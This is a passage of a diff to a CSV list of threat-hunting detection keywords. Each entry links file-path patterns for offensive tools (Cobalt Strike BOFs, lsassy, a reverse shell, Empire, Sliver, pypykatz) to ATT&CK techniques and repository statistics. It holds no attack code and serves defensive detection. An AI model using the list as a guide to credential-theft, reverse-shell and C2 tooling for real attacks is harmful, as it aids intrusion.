- TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" -"*/silentdump.h*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/SilentClean.exe*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*/SilentClean/SilentClean/*.cs*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*/silentdump.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/silentdump.h*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/SilentHound.git*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","1","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" "*/SilentMoonwalk.git*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" -"*/silentprocessexit.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*/silentprocessexit.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*/silenttrinity/*.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*/simple_hijacker/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*/SimpleLoader.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*/SimpleLoader.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*/simple_hijacker/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/SimpleLoader.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*/SimpleLoader.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*/Simple-Reverse-Shell*","offensive_tool_keyword","Simple-Reverse-Shell","Simple C++ reverse shell without obfuscation to avoid Win 11 defender detection (At the time of publication","T1548 - T1562 - T1027","TA0003 - TA0008","N/A","N/A","Shell spawning","https://github.com/tihanyin/Simple-Reverse-Shell/","1","1","N/A","N/A","2","114","30","2021-12-21T15:51:48Z","2021-12-19T22:16:32Z" "*/SimplyEmail.git*","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","918","242","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" "*/sip-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -5275,8 +5331,8 @@ "*/sitadel.py*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","1","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" "*/sites-available/striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/sites-enabled/striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" -"*/situational_awareness/*.exe","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1143","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*/situational_awareness/*.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1147","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/situational_awareness/*.exe","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1143","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/situational_awareness/*.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1147","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/skelsec/pypykatz*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/skelsec/pypykatz","1","1","N/A","10","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*/skypev2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Slackor.git*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" @@ -5284,24 +5340,25 @@ "*/sleep_python_bridge/*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/Sleeper/Sleeper.cna*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*/sleepmask.cna*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*/slinky.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/SlinkyCat.git*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" -"*/sliver.git*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/sliver.pb.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/sliver.proto*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" 